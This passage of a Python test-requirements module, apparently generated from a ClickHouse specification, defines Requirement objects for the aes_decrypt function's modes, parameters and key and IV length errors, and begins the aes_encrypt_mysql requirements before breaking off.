'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_ECB = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ecb` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_ECB = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ecb` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_CBC = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cbc` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_CBC = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cbc` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_CBC = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cbc` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_CFB1 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb1` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_CFB1 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb1` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_CFB1 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb1` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_CFB8 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb8` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_CFB8 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb8` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_CFB8 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb8` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_CFB128 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb128` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_CFB128 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb128` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_CFB128 = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb128` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_OFB = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ofb` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_OFB = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ofb` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_OFB = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ofb` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_GCM = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-GCM',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-gcm` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [GCM] block mode encryption with a 128 bit key.\n'
'An [AEAD] 16-byte tag is expected present at the end of the ciphertext according to\n'
'the [RFC5116].\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_GCM = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-GCM',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-gcm` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [GCM] block mode encryption with a 192 bit key.\n'
'An [AEAD] 16-byte tag is expected present at the end of the ciphertext according to\n'
'the [RFC5116].\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_GCM = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-GCM',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-gcm` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [GCM] block mode encryption with a 256 bit key.\n'
'An [AEAD] 16-byte tag is expected present at the end of the ciphertext according to\n'
'the [RFC5116].\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_128_CTR = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-128-CTR',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ctr` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CTR] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_192_CTR = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-192-CTR',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ctr` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CTR] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_Mode_Value_AES_256_CTR = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.Mode.Value.AES-256-CTR',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ctr` as the value for the `mode` parameter of the `aes_decrypt` function\n'
'and [AES] algorithm SHALL use the [CTR] block mode encryption with a 256 bit key.\n'
),
link=None
)
# Optional `aes_decrypt` parameters (`iv` fourth, `aad` fifth) and the return
# value contract (decrypted data as `String`).
RQ_SRS008_AES_Decrypt_Function_Parameters_InitializationVector = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.InitializationVector',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `iv` with `String` or `FixedString` data types as the optional fourth\n'
'parameter to the `aes_decrypt` function that SHALL specify the initialization vector for block modes that require\n'
'it.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_AdditionalAuthenticatedData = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.AdditionalAuthenticatedData',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aad` with `String` or `FixedString` data types as the optional fifth\n'
'parameter to the `aes_decrypt` function that SHALL specify the additional authenticated data\n'
'for block modes that require it.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_ReturnValue = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.ReturnValue',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return the decrypted value of the data\n'
'using `String` data type as the result of `aes_decrypt` function.\n'
),
link=None
)
# `aes_decrypt` must reject a `key` whose length does not match the block mode.
RQ_SRS008_AES_Decrypt_Function_Key_Length_InvalidLengthError = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Key.Length.InvalidLengthError',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `key` length is not exact for the `aes_decrypt` function for a given block mode.\n'
),
link=None
)
# `aes_decrypt` must reject an `iv` whose length does not match the block mode.
# Fix: corrected the typo "speficified" -> "specified" in the description.
# NOTE(review): this file is generated from the SRS document — apply the same
# typo fix to the source document so regeneration does not reintroduce it.
RQ_SRS008_AES_Decrypt_Function_InitializationVector_Length_InvalidLengthError = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.InitializationVector.Length.InvalidLengthError',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `iv` is specified and the length is not exact for the `aes_decrypt` function for a given block mode.\n'
),
link=None
)
# `aes_decrypt` must reject `iv`/`aad` arguments for modes that do not use them,
# while placing no size limit on `aad` where it is accepted.
RQ_SRS008_AES_Decrypt_Function_InitializationVector_NotValidForMode = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.InitializationVector.NotValidForMode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `iv` is specified for the `aes_decrypt` function\n'
'for a mode that does not need it.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AdditionalAuthenticationData_NotValidForMode = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AdditionalAuthenticationData.NotValidForMode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `aad` is specified for the `aes_decrypt` function\n'
'for a mode that does not need it.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AdditionalAuthenticationData_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AdditionalAuthenticationData.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL not limit the size of the `aad` parameter passed to the `aes_decrypt` function.\n'
),
link=None
)
# `aes_decrypt` key/iv length requirements for ECB, CBC, and CFB1 modes.
# ECB takes neither `iv` nor `aad`; CBC/CFB1 allow a 16-byte `iv` but no `aad`.
RQ_SRS008_AES_Decrypt_Function_AES_128_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-ecb` and `key` is not 16 bytes\n'
'or `iv` or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-ecb` and `key` is not 24 bytes\n'
'or `iv` or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-ecb` and `key` is not 32 bytes\n'
'or `iv` or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_128_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-cbc` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-cbc` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-cbc` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_128_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-cfb1` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-cfb1` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-cfb1` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
# `aes_decrypt` key/iv length requirement for aes-128-cfb8.
# NOTE(review): like its encrypt twin, this description reads "and if specified
# `iv` is not 16 bytes." — "and" instead of "or", and no `aad` clause — unlike
# all sibling cfb requirements. This file is generated from the SRS; confirm
# against the source document whether the divergence is intentional.
RQ_SRS008_AES_Decrypt_Function_AES_128_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-cfb8` and `key` is not 16 bytes\n'
'and if specified `iv` is not 16 bytes.\n'
),
link=None
)
# `aes_decrypt` key/iv length requirement for aes-192-cfb8.
# Fix: the description read "or `iv` is not 16 bytes", dropping the
# "if specified" qualifier used by the encrypt twin
# (RQ.SRS008.AES.Encrypt.Function.AES-192-CFB8...) and every sibling mode —
# `iv` is optional here, so the qualifier matters. Restored for consistency.
# NOTE(review): this file is generated from the SRS document — apply the same
# wording fix to the source document so regeneration does not reintroduce it.
RQ_SRS008_AES_Decrypt_Function_AES_192_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-cfb8` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
# `aes_decrypt` key/iv length requirements for the remaining modes in this chunk.
# CFB8-256, CFB128, OFB: error on wrong key size, 16-byte iv violation, or `aad`.
# GCM (128/192): error on wrong key size or when `iv` is missing / under 8 bytes.
RQ_SRS008_AES_Decrypt_Function_AES_256_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-cfb8` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_128_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-cfb128` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-cfb128` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-cfb128` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_128_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-ofb` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-ofb` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-ofb` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_128_GCM_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-GCM.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-gcm` and `key` is not 16 bytes\n'
'or `iv` is not specified or is less than 8 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_GCM_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-GCM.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-gcm` and `key` is not 24 bytes\n'
'or `iv` is not specified or is less than 8 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_GCM_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-GCM.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-gcm` and `key` is not 32 bytes\n'
'or `iv` is not specified or is less than 8 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_128_CTR_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-CTR.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-ctr` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_CTR_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-CTR.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-ctr` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_CTR_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-CTR.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-ctr` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes.\n'
),
link=None
)
# `aes_encrypt_mysql`: base requirement, call syntax, and the first three
# parameters (plaintext, key, mode).  Same Requirement contract as every
# other RQ_* constant in this module; only layout differs.
RQ_SRS008_AES_MySQL_Encrypt_Function = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL support `aes_encrypt_mysql` function to encrypt data using [AES].\n')
# Accepted call shape of the function.
RQ_SRS008_AES_MySQL_Encrypt_Function_Syntax = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function.Syntax',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL support the following syntax for the `aes_encrypt_mysql` function\n'
                '\n'
                '```sql\n'
                'aes_encrypt_mysql(plaintext, key, mode, [iv])\n'
                '```\n')
# First positional parameter: the data to encrypt.
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_PlainText = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.PlainText',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL support `plaintext` accepting any data type as\n'
                'the first parameter to the `aes_encrypt_mysql` function that SHALL specify the data to be encrypted.\n')
# Second positional parameter: the encryption key.
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Key = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Key',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL support `key` with `String` or `FixedString` data types\n'
                'as the second parameter to the `aes_encrypt_mysql` function that SHALL specify the encryption key.\n')
# Third positional parameter: key length + block mode selector.
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL support `mode` with `String` or `FixedString` data types as the third parameter\n'
                'to the `aes_encrypt_mysql` function that SHALL specify encryption key length and block encryption mode.\n')
# Format of accepted `mode` values for `aes_encrypt_mysql`.
# Fix: the description read "SHALL specifies" -- corrected to the grammatical
# "SHALL specify".  NOTE(review): this file is generated from an SRS document;
# the same fix should be applied upstream so regeneration does not revert it.
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_ValuesFormat = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.ValuesFormat',
    version='1.0',
    priority=None,
    group=None,
    type=None,
    uid=None,
    description=(
        '[ClickHouse] SHALL support values of the form `aes-[key length]-[mode]` for the `mode` parameter\n'
        'of the `aes_encrypt_mysql` function where\n'
        'the `key_length` SHALL specify the length of the key and SHALL accept\n'
        '`128`, `192`, or `256` as the values and the `mode` SHALL specify the block encryption\n'
        'mode and SHALL accept [ECB], [CBC], [CFB1], [CFB8], [CFB128], or [OFB]. For example, `aes-256-ofb`.\n'
    ),
    link=None
)
# Invalid `mode` values for `aes_encrypt_mysql` must be rejected, except when
# the underlying OpenSSL build happens to support such a mode.
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_Invalid = Requirement(
    name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.Invalid',
    version='1.0',
    priority=None, group=None, type=None, uid=None, link=None,
    description='[ClickHouse] SHALL return an error if the specified value for the `mode` parameter of the `aes_encrypt_mysql`\n'
                'function is not valid with the exception where such a mode is supported by the underlying\n'
